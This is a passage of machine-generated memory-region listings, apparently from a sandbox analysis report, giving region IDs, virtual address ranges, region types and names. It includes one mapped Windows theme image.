filename = "" Region: id = 3555 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3556 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3557 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3558 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3559 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3560 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3561 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3562 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3563 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3564 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3565 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3566 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3567 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3568 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3569 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3570 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3571 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3572 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3573 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3574 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3575 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3576 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3577 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3578 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3579 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3580 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3581 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3582 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3583 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3584 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3585 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3586 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3587 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3588 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3589 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3590 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3591 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3592 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3593 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3594 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3595 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3596 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3597 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3598 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3599 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3600 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3601 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3602 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3603 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3604 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3605 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3606 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3607 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3608 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3609 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3610 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3611 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3612 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3613 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3614 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3615 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3616 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3617 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3618 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3619 start_va = 0x2370000 end_va = 0x2370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 3620 start_va = 0x2460000 end_va = 0x247bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 3621 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3622 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3623 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3624 start_va = 0x2460000 end_va = 0x247bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 3625 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3626 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3627 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3628 start_va = 0x2460000 end_va = 0x247bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 3629 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3630 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3631 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3632 start_va = 0x2460000 end_va = 0x247bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 3633 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3634 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3642 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3643 start_va = 0x2460000 end_va = 0x247bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 3644 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3645 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3646 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3647 start_va = 0x2460000 end_va = 0x247bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 3648 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3649 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3650 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3651 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3652 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3653 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3654 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3655 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3656 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3657 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3658 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3659 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3660 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3661 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3662 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3663 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3664 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3665 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3666 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3667 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3668 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3669 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3670 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3671 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3672 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3673 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3674 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3675 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3676 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3677 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3678 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3679 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3680 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3681 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3682 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3683 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3684 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3685 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3686 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3687 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3688 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3689 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3690 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3691 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3692 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3693 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3694 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3695 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3696 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3697 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3698 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3699 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3700 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3701 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3702 start_va = 0x3cf0000 end_va = 0x3d27fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 3703 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3704 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3705 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3706 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3707 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3708 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 3709 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3710 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3711 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3712 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3713 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3714 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3715 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3716 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3717 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3718 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3719 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3720 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3721 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3722 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3723 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3724 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3725 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3726 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3727 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3728 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3729 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3730 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3731 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3732 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3733 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3734 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3735 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3736 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3737 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3738 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3739 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3740 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3741 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3742 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3743 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3744 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3745 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3746 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3747 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3748 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3749 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3750 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3751 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3752 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3753 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3754 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3755 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3756 start_va = 0x530000 end_va = 0x53efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3757 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 3758 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3759 start_va 